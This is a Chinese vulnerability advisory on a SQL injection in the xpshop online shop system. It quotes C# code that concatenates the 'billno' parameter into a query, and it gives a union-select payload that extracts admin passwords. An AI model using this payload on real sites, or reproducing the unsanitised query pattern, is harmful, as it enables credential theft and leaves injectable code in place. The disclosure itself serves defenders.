xpshop网店系统sql注入再来一处

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 应该还有几个就收工了,其实还有一些,不过感觉好累不想弄了。再挖多几个就收工了! ### 详细说明: 漏洞位置xpshop.webui.IspOrderReturnBy: ``` protected void Page_Load(object sender, EventArgs e) { base.Response.AddHeader("Pragma", "No-Cache"); base.Response.Buffer = true; base.Response.ExpiresAbsolute = DateTime.Now.AddSeconds(-1.0); base.Response.Expires = 0; base.Response.CacheControl = "no-cache"; OrderDB orderDB = new OrderDB(); int orderID = orderDB.GetOrderID(base.Request["billno"].ToString()); this.order = orderDB.GetOrderDetails(orderID); ``` 跟进GetOrderID函数: ``` public int GetOrderID(string orderNo) { return int.Parse(XpShopDB.ExecuteScalar(XpShopDB.ConnectionString, CommandType.Text, "SELECT OrderID FROM Orders WHERE OrderNo = '" + orderNo + "'", null).ToString()); } ``` 都是一样没过滤直接进库的。 payload: /isporderreturnby.aspx?billno=test' union select password from admin-- ### 漏洞证明: http://localhost/isporderreturnby.aspx?billno=test' union select password from admin-- [<img...

0%

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息